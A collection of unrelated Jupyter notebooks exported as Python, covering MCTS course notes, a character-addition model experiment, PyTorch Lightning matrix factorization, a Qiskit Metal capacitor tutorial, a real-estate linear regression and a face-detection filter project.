# _(this will likely take long time, better consider this as side project when all other deadlines are met)_
#
# Incorporate planning into the agent architecture.
#
# The goal is to implement [Value Iteration Networks](https://arxiv.org/abs/1602.02867)
#
# For starters, remember [week7 assignment](https://github.com/yandexdataschool/Practical_RL/blob/master/week7/7.2_seminar_kung_fu.ipynb)? If not, use [this](http://bit.ly/2oZ34Ap) instead.
#
# You will need to switch it into a maze-like game, consider MsPacman or the games from week7 [Bonus: Neural Maps from here](https://github.com/yandexdataschool/Practical_RL/blob/master/week7/7.3_homework.ipynb).
#
# You will need to implement a special layer that performs value iteration-like update to a recurrent memory. This can be implemented the same way you did attention from week7 or week8.
# ## Notes
#
#
# #### Assumptions
#
# The full list of assumptions is
# * __Finite actions__ - we enumerate all actions in `expand`
# * __Episodic (finite) MDP__ - while technically it works for infinite mdp, we rollout for $ 10^4$ steps. If you are knowingly infinite, please adjust `t_max` to something more reasonable.
# * __No discounted rewards__ - we assume $\gamma=1$. If that isn't the case, you only need to change a two lines in `rollout` and use `my_R = r + gamma*child_R` for `propagate`
# * __pickleable env__ - won't work if e.g. your env is connected to a web-browser surfing the internet. For custom envs, you may need to modify get_snapshot/load_snapshot from `WithSnapshots`.
#
# #### On `get_best_leaf` and `expand` functions
#
# This MCTS implementation only selects leaf nodes for expansion.
# This doesn't break things down because `expand` adds all possible actions. Hence, all non-leaf nodes are by design fully expanded and shouldn't be selected.
#
# If you want to only add a few random action on each expand, you will also have to modify `get_best_leaf` to consider returning non-leafs.
#
# #### Rollout policy
#
# We use a simple uniform policy for rollouts. This introduces a negative bias to good situations that can be messed up completely with random bad action. As a simple example, if you tend to rollout with uniform policy, you better don't use sharp knives and walk near cliffs.
#
# You can improve that by integrating a reinforcement _learning_ algorithm with a computationally light agent. You can even train this agent on optimal policy found by the tree search.
#
# #### Contributions
# * Reusing some code from 5vision [solution for deephack.RL](https://github.com/5vision/uct_atari), code by <NAME>
# * Using some code from [this gist](https://gist.github.com/blole/dfebbec182e6b72ec16b66cc7e331110)
|
week6_outro/practice_mcts.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda root]
# language: python
# name: conda-root-py
# ---
# ## char addition
# * DIGITS = 2
#
# * one example
#
# * original input: **12 + 2**, output: **15**
#
# after encoding
# * encoded input: **12+2#**, output: **15#**
#
# and **#** used to pad the strings to same length
#
# ```
# >>> train_X.shape, train_y.shape
# >>> (5050, 5), (5050, 3, 12)
# ```
# 
#
# ```
# >>> reversed_X = train_X[:, ::-1]
# >>> combined_X = np.concatenate([train_X, reversed_X], axis=0)
# >>> combined_y = np.concatenate([train_y, train_y], axis=0)
# >>> combined_X.shape, combined_y.shape
# >>> (10100, 5), (10100, 3, 12)
# ```
# 
#
# 使用数据多的模型训练的结果反而更差?
#
# after reversing, the above encoded input/output will be
# ```
# reversed input: #2+21, output: #51
# ```
# presumely, such reversing will confuse the model, as **2+21#** --> **23#**.
#
# Thus, we can cancel the padding term, and add one end-of-string term
#
# * one example
#
# * original input: **1+2**, output: **3**
# * encoded input: **1+2##**, output: **3##** (2 **#** padded in order to keep same sequence length)
#
# new encoding manner
# * encoded input: **1+2#**, output: **3#** (one **#** just acts as end-of-line symbol which exists in every string)
#
# * second example
# * original input: **25+30**, output: **55**
# * encoded input: **25+30#**, output: **55#**
#
# thus, lengths of input/output will no longer be fixed
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# +
#csv_file_1 = '/home/huizhu/huizhu/feynman/addition/logs/logger_1.csv'
csv_file_2 = '/home/huizhu/huizhu/feynman/addition/logs/logger.csv'
#df_1 = pd.read_csv(csv_file_1)
df_1 = pd.read_csv(csv_file_2)
plt.plot(df_1.epoch, df_1.acc, label='training data')
plt.plot(df_1.epoch, df_1.val_acc, label='validation data')
plt.xlabel('epoch')
plt.ylabel('accuracy')
plt.legend()
plt.show()
# -
plt.plot(df_2.epoch, df_2.acc, label='training data')
plt.plot(df_2.epoch, df_2.val_acc, label='validation data')
plt.xlabel('epoch')
plt.ylabel('accuracy')
plt.legend()
plt.show()
csv_file = '/home/huizhu/huizhu/feynman/addition/logs/logger_2.csv'
plot(csv_file)
def plot(csv_file):
df = pd.read_csv(csv_file)
plt.plot(df.epoch, df.acc, label='train')
plt.plot(df.epoch, df.val_acc, label='valid')
plt.show()
x[:, ::-1]
|
tests/char_addition.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# import os
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import numpy as np
import torch
print("PyTorch version:",torch.__version__)
if torch.cuda.is_available():
for i in range(torch.cuda.device_count()):
print(f"CUDA GPU {i+1}: {torch.cuda.get_device_name(i)} [Compute Capability: {torch.cuda.get_device_capability(0)[0]}.{torch.cuda.get_device_capability(0)[1]}]")
device = torch.device('cuda')
kwargs = {'num_workers': 8, 'pin_memory': True}
torch.backends.cudnn.benchmark = True
else:
device = torch.device('cpu')
print("CUDA GPU is not available. :(")
import torch.nn as nn
from torch.utils.data import DataLoader, Dataset
import pytorch_lightning as pl
from pytorch_lightning.loggers import TensorBoardLogger
print ("PyTorch Lightning version:",pl.__version__)
import scipy.sparse as sp
from argparse import Namespace
from utilities.custom_lightning import CSVProfiler
import logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logging.debug("Logging enabled at DEBUG level.")
from constants import (SEED, DATA_DIR, LOG_DIR, TRAIN_DATA_PATH, VAL_DATA_PATH, TEST_DATA_PATH)
torch.manual_seed(SEED)
torch.cuda.manual_seed(SEED)
# -
NAME = r'BasicMatrixFactorization'
SAVE_PATH = DATA_DIR+r'/'+NAME+r'.pt'
PROFILE_PATH = LOG_DIR+'\\'+NAME+'\\profile.csv'
# +
class Interactions(Dataset):
"""
Create interactions matrix.
"""
def __init__(self, matrix):
self.matrix = matrix
self.n_users = self.matrix.shape[0]
self.n_items = self.matrix.shape[1]
def __getitem__(self, index):
row = self.matrix.row[index]
col = self.matrix.col[index]
val = self.matrix.data[index]
return (row, col), val
def __len__(self):
return self.matrix.nnz
interaction = Interactions
# +
class TestingCallbacks(pl.Callback):
def on_test_start(self, trainer, pl_module):
global y_hat
y_hat = sp.dok_matrix((hparams.total_users, hparams.total_items), dtype=np.float32)
def on_test_end(self, trainer, pl_module):
logging.debug(f"Non-zero values in prediction matrix: {y_hat.nnz:,}")
sp.save_npz(DATA_DIR+NAME+r'-y_hat.npz',y_hat.tocoo())
# -
class BasicMatrixFactorization(pl.LightningModule):
def __init__(self, hparams):
super(BasicMatrixFactorization, self).__init__()
self.hparams = hparams
self.user_factors = nn.Embedding(hparams.total_users, hparams.n_factors, sparse=hparams.sparse)
self.item_factors = nn.Embedding(hparams.total_items, hparams.n_factors, sparse=hparams.sparse)
def forward(self, users, items):
predictions = (self.user_factors(users) * self.item_factors(items)).sum(dim=1, keepdim=True)
return predictions.squeeze()
def MSELoss(self, logits, labels):
return nn.functional.mse_loss(logits, labels)
def training_step(self, train_batch, batch_idx):
x, y = train_batch
row, column = x
row = row.long()
column = column.long()
logits = self.forward(row,column)
loss = self.MSELoss(logits, y)
logs = {'train_loss': loss}
return {'loss': loss, 'log': logs}
def validation_step(self, val_batch, batch_idx):
x, y = val_batch
row, column = x
row = row.long()
column = column.long()
logits = self.forward(row,column)
loss = self.MSELoss(logits, y)
return {'val_loss': loss}
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()
tensorboard_logs = {'val_loss': avg_loss}
return {'avg_val_loss': avg_loss, 'log': tensorboard_logs}
def test_step(self, test_batch, batch_idx):
x, y = test_batch
row, column = x
row = row.long()
column = column.long()
logits = self.forward(row,column)
loss = self.MSELoss(logits, y)
logits_array = logits.cpu().numpy()
r = row.cpu().numpy()
c = column.cpu().numpy()
for i in range(len(logits_array)):
y_hat[r[i],c[i]]=logits_array[i]
return {'test_loss': loss}
def test_epoch_end(self, outputs):
avg_loss = torch.stack([x['test_loss'] for x in outputs]).mean()
tensorboard_logs = {'MSE': avg_loss}
print(f"Test Mean Squared Error (MSE): {avg_loss}")
return {'avg_test_loss': avg_loss, 'log': tensorboard_logs}
def prepare_data(self):
self.train_dataset = sp.load_npz(TRAIN_DATA_PATH)
self.val_dataset = sp.load_npz(VAL_DATA_PATH)
self.test_dataset = sp.load_npz(TEST_DATA_PATH)
def train_dataloader(self):
return DataLoader(interaction(self.train_dataset), batch_size=self.hparams.batch_size, shuffle=True)
def val_dataloader(self):
return DataLoader(interaction(self.val_dataset), batch_size=self.hparams.batch_size, shuffle=False)
def test_dataloader(self):
return DataLoader(interaction(self.test_dataset), batch_size=self.hparams.batch_size, shuffle=False)
def configure_optimizers(self):
optimizer = torch.optim.SGD(self.parameters(), lr=self.hparams.learning_rate)
return optimizer
uxm = sp.load_npz(TRAIN_DATA_PATH)
total_users = uxm.shape[0]
total_items = uxm.shape[1]
del uxm
# +
hparams = Namespace(**{
'batch_size': 1024,
'learning_rate': 0.99999,
'n_factors': 20,
'sparse': True,
'max_epochs': 100,
'total_users': total_users,
'total_items': total_items
})
profiler = CSVProfiler(output_path=PROFILE_PATH,verbose=True)
logger = TensorBoardLogger(LOG_DIR, name=NAME)
model = BasicMatrixFactorization(hparams)
trainer = pl.Trainer(max_epochs=hparams.max_epochs,
benchmark=True,
profiler=profiler,
logger=logger,
gpus=1,
fast_dev_run=False,
callbacks=[TestingCallbacks()])
trainer.fit(model)
# -
trainer.test()
# +
# torch.save(model.state_dict(), SAVE_PATH)
# +
# loaded_model = BasicMatrixFactorization(hparams)
# loaded_model.load_state_dict(torch.load(SAVE_PATH))
# loaded_model.eval()
# print("Model's state_dict:")
# for param_tensor in loaded_model.state_dict():
# print(param_tensor, "\t", loaded_model.state_dict()[param_tensor].size())
# +
# loaded_model.state_dict()['user_factors.weight']
# +
# loaded_model.state_dict()['item_factors.weight']
|
train-uxml-basic-matrix-factorization.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Coding für Führungskräfte - Test Notebook
#
# 
# Dieses Notebook dient nur als Test um zu überprüfen dass ihr die Notebooks richtig ausführen könnt. Klickt einfach auf die nächste Box (Code-Zelle) und drückt auf eurer Tastatur die Kombination **Shift** und **Enter**.
# +
import numpy as np
print('Ja, alles funktioniert!')
# -
# Falls als Ausgabe `Ja, alles funktioniert!` erscheint, funktioniert alles einwandfrei! Danke für den Test!
#
# Euer Coding-Für-Führungskräfte Team
#
|
resources/test/Test.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # QComponent - 3-fingers capacitor
# #### Standard imports
# +
# %reload_ext autoreload
# %autoreload 2
# %config IPCompleter.greedy=True
# Qiskit Metal
from qiskit_metal import designs
from qiskit_metal import MetalGUI, Dict
# -
# #### Define design object from design_planar and start GUI
# +
design = designs.DesignPlanar()
gui = MetalGUI(design)
# enable rebuild of the same component
design.overwrite_enabled = True
# -
# #### Import the device and inspect the default options
from qiskit_metal.qlibrary.lumped.cap_3_interdigital import Cap3Interdigital
Cap3Interdigital.get_template_options(design)
# #### Instanciate the capacitive device
design.delete_all_components()
c1 = Cap3Interdigital(design, 'C1')
gui.rebuild()
gui.autoscale()
# #### Change something about it
c1.options['finger_length'] = '200um'
gui.rebuild()
gui.autoscale()
# + tags=["nbsphinx-thumbnail"]
gui.screenshot()
|
docs/tut/quick-topics/QComponent-3-fingers-capacitor.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="BHxRfxPtZ7ql" executionInfo={"status": "ok", "timestamp": 1644558512409, "user_tz": -330, "elapsed": 712, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# + id="k8O3tEddaeAB" executionInfo={"status": "ok", "timestamp": 1644558564566, "user_tz": -330, "elapsed": 6, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
datasets= pd.read_csv('/content/sample_data/Real estate.csv')
# + colab={"base_uri": "https://localhost:8080/", "height": 655} id="cszoECaca9BD" executionInfo={"status": "ok", "timestamp": 1644558568892, "user_tz": -330, "elapsed": 570, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="d1f4dbc1-ff77-4e8c-9c1e-01a40dc009af"
datasets
# + colab={"base_uri": "https://localhost:8080/"} id="CNHVLQ6PbIb-" executionInfo={"status": "ok", "timestamp": 1644558585583, "user_tz": -330, "elapsed": 518, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="184ba763-1b66-4e38-9b1d-fe5bbe3cd7ef"
X= datasets.iloc[:,1:7].values
X
# + colab={"base_uri": "https://localhost:8080/"} id="1gMEiN7-clOG" executionInfo={"status": "ok", "timestamp": 1644558613990, "user_tz": -330, "elapsed": 8, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="02de4d0a-2a31-4b4c-ff88-0139d970d2b5"
y=datasets.iloc[:,-1].values
y
# + colab={"base_uri": "https://localhost:8080/"} id="vCzGLmWBdC1R" executionInfo={"status": "ok", "timestamp": 1644558622419, "user_tz": -330, "elapsed": 495, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="834d7915-a502-4c69-db4e-a808654e2b84"
X=X.reshape(414,6)
X
# + colab={"base_uri": "https://localhost:8080/"} id="St4Fag_LdRXU" executionInfo={"status": "ok", "timestamp": 1644558628024, "user_tz": -330, "elapsed": 493, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="b1aa4942-5568-485f-e94a-33d49820a4c5"
y=y.reshape(414,)
y
# + id="kDT7E91fWHc-" executionInfo={"status": "ok", "timestamp": 1644559724976, "user_tz": -330, "elapsed": 515, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
#from sklearn.compose import ColumnTransformer
#from sklearn.preprocessing import OneHotEncoder
# + id="ZqKt-c9CWI_p" executionInfo={"status": "ok", "timestamp": 1644559727170, "user_tz": -330, "elapsed": 8, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
#encoder = OneHotEncoder()
#ct = ColumnTransformer(transformers=[('encoder',encoder, [3])], remainder='passthrough')
# + id="tQjnUDMoWNAh" executionInfo={"status": "ok", "timestamp": 1644559729052, "user_tz": -330, "elapsed": 6, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
#X = ct.fit_transform(X)
# + id="XC4H8JuqWPgx" executionInfo={"status": "ok", "timestamp": 1644559730907, "user_tz": -330, "elapsed": 9, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
#X
# + [markdown] id="SMf7pqztq9Ih"
# Splitting the dataset
# + id="DQpw4zLeqycN" executionInfo={"status": "ok", "timestamp": 1644559735323, "user_tz": -330, "elapsed": 489, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
from sklearn.model_selection import train_test_split
# + id="e6y9bRSNrLvb" executionInfo={"status": "ok", "timestamp": 1644559737062, "user_tz": -330, "elapsed": 3, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.1, random_state= 25)
# + colab={"base_uri": "https://localhost:8080/"} id="kxl71Zgkrthd" executionInfo={"status": "ok", "timestamp": 1644559742990, "user_tz": -330, "elapsed": 902, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="9daeac8f-637e-41e5-ca2d-e16cc88f80c7"
print(X_train)
# + colab={"base_uri": "https://localhost:8080/"} id="jBalbLC8r1Kq" executionInfo={"status": "ok", "timestamp": 1644559760541, "user_tz": -330, "elapsed": 524, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="d3f26c6a-f01e-4e15-e3ae-2490e6701d10"
print(y_train)
# + colab={"base_uri": "https://localhost:8080/"} id="uAJ_OUynr74m" executionInfo={"status": "ok", "timestamp": 1644559777138, "user_tz": -330, "elapsed": 466, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="85ea7cc8-981e-4511-b505-0e8f0789f91b"
print(X_test)
# + colab={"base_uri": "https://localhost:8080/", "height": 304} id="cheb5o3psGN-" executionInfo={"status": "error", "timestamp": 1644559781428, "user_tz": -330, "elapsed": 461, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="3429de82-9c1b-490b-844f-faf8489a598b"
print(len(X_test))
print(len(X_train))
# + colab={"base_uri": "https://localhost:8080/"} id="gIiEEeigsfhZ" executionInfo={"status": "ok", "timestamp": 1644558985195, "user_tz": -330, "elapsed": 10, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="d957b21d-e126-4b5c-8944-676fbf28a593"
print(y_test)
# + colab={"base_uri": "https://localhost:8080/"} id="5ldAsxOOsrGK" executionInfo={"status": "ok", "timestamp": 1644558989629, "user_tz": -330, "elapsed": 481, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="efa8f27a-f1f9-4786-b2f9-35a223a2b67d"
print(len(y_test))
print(len(y_train))
X_train.shape
# + [markdown] id="CBznXB0ZtH-B"
# Model Setup
# + id="utt3XjwAtF6I" executionInfo={"status": "ok", "timestamp": 1644558994919, "user_tz": -330, "elapsed": 541, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
from sklearn.linear_model import LinearRegression
# + id="hNs35lSEtTJ2" executionInfo={"status": "ok", "timestamp": 1644558996754, "user_tz": -330, "elapsed": 5, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
model = LinearRegression()
# + [markdown] id="R6hlWppqtbGy"
# Training
# + colab={"base_uri": "https://localhost:8080/"} id="z8IeXlWutc74" executionInfo={"status": "ok", "timestamp": 1644559001167, "user_tz": -330, "elapsed": 515, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="651bea5e-6e86-4ab3-ee73-085df8c07b3f"
model.fit(X_train, y_train)
# + [markdown] id="EybL-1kDtqE7"
# Predicting
# + id="ftJARexMtxRj" executionInfo={"status": "ok", "timestamp": 1644559007403, "user_tz": -330, "elapsed": 543, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
y_pred = model.predict(X_test)
# + colab={"base_uri": "https://localhost:8080/"} id="CGiVW-5svgQp" executionInfo={"status": "ok", "timestamp": 1644559009073, "user_tz": -330, "elapsed": 7, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="7b96e95a-563c-4b77-b222-1e4630684380"
[y_test, y_pred]
# + [markdown] id="oULYJnaxvtw8"
# Evaluating Model
# + id="ie8vDUjyvsdE" executionInfo={"status": "ok", "timestamp": 1644559014968, "user_tz": -330, "elapsed": 515, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
from sklearn.metrics import r2_score
# + colab={"base_uri": "https://localhost:8080/"} id="mds3VMa-wVhU" executionInfo={"status": "ok", "timestamp": 1644559017053, "user_tz": -330, "elapsed": 7, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="dce4e1b2-27da-4642-cfbd-ea384d4409b9"
r2_score(y_test, y_pred)
# + colab={"base_uri": "https://localhost:8080/"} id="-wwwdw9g13a0" executionInfo={"status": "ok", "timestamp": 1644559022775, "user_tz": -330, "elapsed": 537, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="926a55a8-3abf-4198-9e30-2b047611c43c"
X_test[0]
# + [markdown] id="xRnjhARA5T2A"
# Predicting on single value
# + colab={"base_uri": "https://localhost:8080/", "height": 183} id="dtsy6gwc5XNl" executionInfo={"status": "error", "timestamp": 1644561865695, "user_tz": -330, "elapsed": 16, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="5d491232-ac4a-41bf-d472-472d8edf2a94"
x1= ([[2012.917,32, 84.87, 10, 24.98, 121.54]])
y1 = model.predict(x1)
|
Real_Estate.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Face Filter
#
# By <NAME> and <NAME>.<br>
# Created for the CSCI 4622 - Machine Learning final project.
# + pycharm={"name": "#%%\n"}
import os
import io
import json
import requests
import numpy as np
import matplotlib.pyplot as plt
from typing import Tuple
from PIL import Image
from keras import Sequential
from keras.layers import Conv2D, MaxPooling2D, BatchNormalization, Flatten, Dense, Dropout
# -
# ### Problem Description
#
# Face filter solves the problem that many social media companies face: detecting faces in an image and applying a filter
# to them. Facebook, Snapchat, TikTok, and many more companies use this technology to make applying filters to images much
# easier, without requiring their users to manually tell the software where their face is. We wanted to create our own
# version of this for our final project in order to learn how it is done.
#
# This project is completed in two parts. First, this notebook serves as a detailed description of our project, our EDA
# procedure, model analysis, and also contains code for generating, training, and saving the final model we chose to work
# with. The other part of our project is a Python script that repeatedly takes an image from a web camera, uses the model
# generated by this notebook to detect your face, applies a "bulge" filter to it, and displays the result to the user.
# This can be found in the main.py file.
#
# This is a supervised learning problem since we are providing the model with labels during training.
#
# ### Exploratory Data Analysis
#
# We started our project using a dataset from Kaggle located here:
# https://www.kaggle.com/drgilermo/face-images-with-marked-landmark-points. This dataset looked very promising at first
# since it seemed to provide many facial landmarks we could work with in order to make our filter respond uniquely to
# different shapes of faces. However, after a discussion about the scope of our project, we determined that would be too
# hard to fit in the time frame of this project, and decided that simply detecting the center of the face and applying the
# filter there would be good enough. This dataset would still work though, as our first attempt was to use only the nose
# tip data from this dataset, which gave a good approximation of the center of the face. Unfortunately, after attempting
# to train models on this dataset, we realized the dataset would not allow our model to be general enough since almost all
# samples in the dataset are zoomed in on someone's face. If we expected our users to put their face right up to the
# camera anyway, there would be no reason to detect faces in the first place. From here we realized we needed to look for
# a better dataset that did not only contain zoomed in images.
#
# After some research, we came across this dataset: https://www.kaggle.com/dataturks/face-detection-in-images. This
# dataset seemed great because it contained people's faces in many different situations, not just when the camera is
# zoomed in on someone's face. The label data was a bounding box around each face, which is less information than the
# previous dataset offered, but by averaging together each corner of the box, we were still able to determine the center
# of the face, which is fine enough for our project. The only problem with this dataset is that it is rather small. After
# removing the samples that were of no use to our project, we were left with only 145 data points. When we tried to train
# a model on this dataset, we ended up with either a model that was not accurate enough for our project, or a model that
# was over fit to the training data. Either way, we needed more data.
#
# The solution we came up with was to generate some of our own data. We did this by taking many pictures of ourselves and
# the family we were with in front of a variety of backgrounds, lighting conditions, and facial expressions. We then
# labeled each point in the generated data with the center of the face. In order to aid this process, we created a tool
# inside the main.py file for generating data easily. To start this tool, run `python main.py --mode datagen`, and click
# on the center of your face to create a data point. After closing the program, the results are saved to a file. Writing
# this tool allowed us to generate hundreds of data points in a relatively short amount of time. With the data from the
# dataset combine with our generated data, we were able to create a very general model with a high accuracy.
#
# Before clean the data, lets download the data first. The dataset is committed to this repository for your convenience,
# but the images are simply URLs that must be fetched. Once they are fetched once, they are stored in a file so they do
# not need to be fetched again.
# + pycharm={"name": "#%%\n"}
CACHED_DATA_PATH = 'cached_data'
full_cached_data_path = '{}.npy'.format(CACHED_DATA_PATH)
def fetch_image(url: str) -> np.ndarray:
""" Fetch and image from a url and convert it to a numpy array.
The return value's shape is (width, height, number of channels). If the image is a JPG, there will be three
channels (RGBA). If the image is a PNG, there will be four channels (RGBA).
"""
return np.asarray(Image.open(io.BytesIO(requests.get(url).content)))
# Load in the dataset.
with open('data.json') as file:
raw_data = json.load(file)
# Filter out all images with more than one person. The reason for this is explained in the markdown cell below.
raw_data = filter(lambda point: len(point['annotation']) == 1, raw_data)
# Only download the images if they are not already downloaded.
if os.path.exists(full_cached_data_path):
print('Images have already been downloaded. Loading from cache...')
raw_face_data = np.load(full_cached_data_path)
else:
print('Images not found, downloading now...')
raw_face_data = np.array([fetch_image(point['content']) for point in raw_data])
np.save(CACHED_DATA_PATH, raw_face_data)
# -
# Now it is time to clean the data. This involves removing the information that is useless for this project, as well as
# structuring each image in a standard shape so that every image has the same resolution, aspect ratio, color channels,
# etc.
#
# The dataset from the internet was a series of images that were either JPGs or PNGs. These are all converted into numpy
# arrays in the function defined above. Each array returned by the function has a dimension for the image's width, a
# dimension for the image's height, and a dimension for the image's color channels. JPGs have three color channels (RGB)
# while PNGs have four color channels (RGBA). The labels come right from the json file in this repository, which contains
# a list of "annotations" for each image, each storing two x values and two y values representing the bounding box around
# a face. If there are multiple annotations for an image, it means that there are more than one face present in the image.
#
# For the scope of our project, we do not feel the need to support multiple faces in an image, so the first step to
# cleaning the data is to remove all images with multiple faces. This step is actually done on the
# `raw_data = filter(lambda point: len(point['annotation']) == 1, raw_data)` line above, since removing these images
# before they are downloaded saves a lot of time while downloading the images, and also reduces the image cache size.
#
# The next step in cleaning the data is to convert the bounding box data into point data the represents the center of the
# face. We did this by averaging together the two x points and the two y points as shown below.
# + pycharm={"name": "#%%\n"}
raw_point_data = np.array([[
np.mean([
point['annotation'][0]['points'][0]['x'],
point['annotation'][0]['points'][1]['x'],
]),
np.mean([
point['annotation'][0]['points'][0]['y'],
point['annotation'][0]['points'][1]['y'],
])
] for point in raw_data])
# -
# The point data is still not ready to be used yet though, since it is currently represented by percentages of the whole
# image. For example, if an image had a width of 500 pixels and the x coordinate of the face center was at 100 pixels, it
